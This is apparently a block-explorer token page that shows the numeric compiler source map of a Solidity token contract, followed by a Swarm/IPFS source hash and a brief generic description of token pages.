1587:2;1572:18;;1453:177;9717:26:0;;;;;;;;-1:-1:-1;9757:4:0;9347:420;;;;;:::o;6421:20::-;;;;;;;:::i;7407:299::-;7510:4;;7475:12;;-1:-1:-1;;;;;7504:10:0;;;7510:4;;;;;7504:10;;7496:34;;;;-1:-1:-1;;;7496:34:0;;3200:2:1;7496:34:0;;;3182:21:1;3239:2;3219:18;;;3212:30;-1:-1:-1;;;3258:18:1;;;3251:41;3309:18;;7496:34:0;;;;;;;;;7569:10;7560:20;;;;:8;:20;;;;;;:32;;7585:6;7560:24;:32::i;:::-;7546:10;7537:20;;;;:8;:20;;;;;;:55;;;;-1:-1:-1;;;;;7614:12:0;;;;;;:24;;7631:6;7614:16;:24::i;:::-;-1:-1:-1;;;;;7599:12:0;;;;;;:8;:12;;;;;;;:39;;;;7650:32;;7659:10;;7650:32;;;;7675:6;1599:25:1;;1587:2;1572:18;;1453:177;7224:179:0;5132:5;;-1:-1:-1;;;;;5132:5:0;5118:10;:19;5110:28;;;;;;-1:-1:-1;;;;;7303:22:0;::::1;7295:69;;;::::0;-1:-1:-1;;;7295:69:0;;3540:2:1;7295:69:0::1;::::0;::::1;3522:21:1::0;3579:2;3559:18;;;3552:30;3618:34;3598:18;;;3591:62;-1:-1:-1;;;3669:18:1;;;3662:32;3711:19;;7295:69:0::1;3338:398:1::0;7295:69:0::1;7372:25;7380:8;7390:6;7372;:25::i;:::-;7224:179:::0;;:::o;712:104::-;764:6;792:1;787;:6;;779:15;;;;;;805:5;809:1;805;:5;:::i;:::-;801:9;712:104;-1:-1:-1;;;712:104:0:o;10597:1326::-;11172:4;;-1:-1:-1;;;;;11165:11:0;;;11172:4;;;;;11165:11;;;:159;;-1:-1:-1;11245:11:0;;11238:41;;-1:-1:-1;;;11238:41:0;;-1:-1:-1;;;;;1409:32:1;;;11238:41:0;;;1391:51:1;11245:11:0;;;;11238:34;;1364:18:1;;11238:41:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;:49;;11283:4;11238:49;;:69;;-1:-1:-1;11300:7:0;;-1:-1:-1;;;;;11291:16:0;;;11300:7;;11291:16;11238:69;11237:86;;;;-1:-1:-1;11319:4:0;;-1:-1:-1;;;;;11312:11:0;;;11319:4;;;;;11312:11;11237:86;11165:267;;;-1:-1:-1;11398:4:0;;-1:-1:-1;;;;;11391:11:0;;;11398:4;;;;;11391:11;:40;;;;-1:-1:-1;11425:6:0;;-1:-1:-1;;;;;11406:15:0;;;;;;:8;:15;;;;;;:25;;11391:40;11157:319;;;;-1:-1:-1;;;11157:319:0;;4487:2:1;11157:319:0;;;4469:21:1;4526:2;4506:18;;;4499:30;4565:28;4545:18;;;4538:56;4611:18;;11157:319:0;4285:350:1;330:104:0;382:6;401:5;405:1;401;:5;:::i;:::-;397:9;;426:1;421;:6;;413:15;;;;;10075:518;10466:7;:18;;-1:-1:-1;;;;;;10466:18:0;-1:-1:-1;;;;;10466:18:0;;;;;10503:12;;:25;;10520:7;10503:16;:25::i;:::-;10488:12;:40;-1:-1:-1;;;;;10556:18:0;;;;;;:8;:18;;;;;;:31;;10579:7;10556:22;:31::i;:::-;-1:-1:-1;;;;;10535:18:0;;;;;;;:8;:18;;;;;:52;;;;-1:-1:-1;10075:518:0:o;14:597:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1635:328::-;1712:6;1720;1728;1781:2;1769:9;1760:7;1756:23;1752:32;1749:52;;;1797:1;1794;1787:12;1749:52;1820:29;1839:9;1820:29;:::i;:::-;1810:39;;1868:38;1902:2;1891:9;1887:18;1868:38;:::i;:::-;1858:48;;1953:2;1942:9;1938:18;1925:32;1915:42;;1635:328;;;;;:::o;2157:186::-;2216:6;2269:2;2257:9;2248:7;2244:23;2240:32;2237:52;;;2285:1;2282;2275:12;2237:52;2308:29;2327:9;2308:29;:::i;2348:260::-;2416:6;2424;2477:2;2465:9;2456:7;2452:23;2448:32;2445:52;;;2493:1;2490;2483:12;2445:52;2516:29;2535:9;2516:29;:::i;:::-;2506:39;;2564:38;2598:2;2587:9;2583:18;2564:38;:::i;:::-;2554:48;;2348:260;;;;;:::o;2613:380::-;2692:1;2688:12;;;;2735;;;2756:61;;2810:4;2802:6;2798:17;2788:27;;2756:61;2863:2;2855:6;2852:14;2832:18;2829:38;2826:161;;;2909:10;2904:3;2900:20;2897:1;2890:31;2944:4;2941:1;2934:15;2972:4;2969:1;2962:15;2826:161;;2613:380;;;:::o;3741:127::-;3802:10;3797:3;3793:20;3790:1;3783:31;3833:4;3830:1;3823:15;3857:4;3854:1;3847:15;3873:125;3913:4;3941:1;3938;3935:8;3932:34;;;3946:18;;:::i;:::-;-1:-1:-1;3983:9:1;;3873:125::o;4003:277::-;4070:6;4123:2;4111:9;4102:7;4098:23;4094:32;4091:52;;;4139:1;4136;4129:12;4091:52;4171:9;4165:16;4224:5;4217:13;4210:21;4203:5;4200:32;4190:60;;4246:1;4243;4236:12;4640:128;4680:3;4711:1;4707:6;4704:1;4701:13;4698:39;;;4717:18;;:::i;:::-;-1:-1:-1;4753:9:1;;4640:128::o

Swarm Source

ipfs://c79d4e3aa10534071d002aa3505199170f235e449410790d325eb5f18c2c4056
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.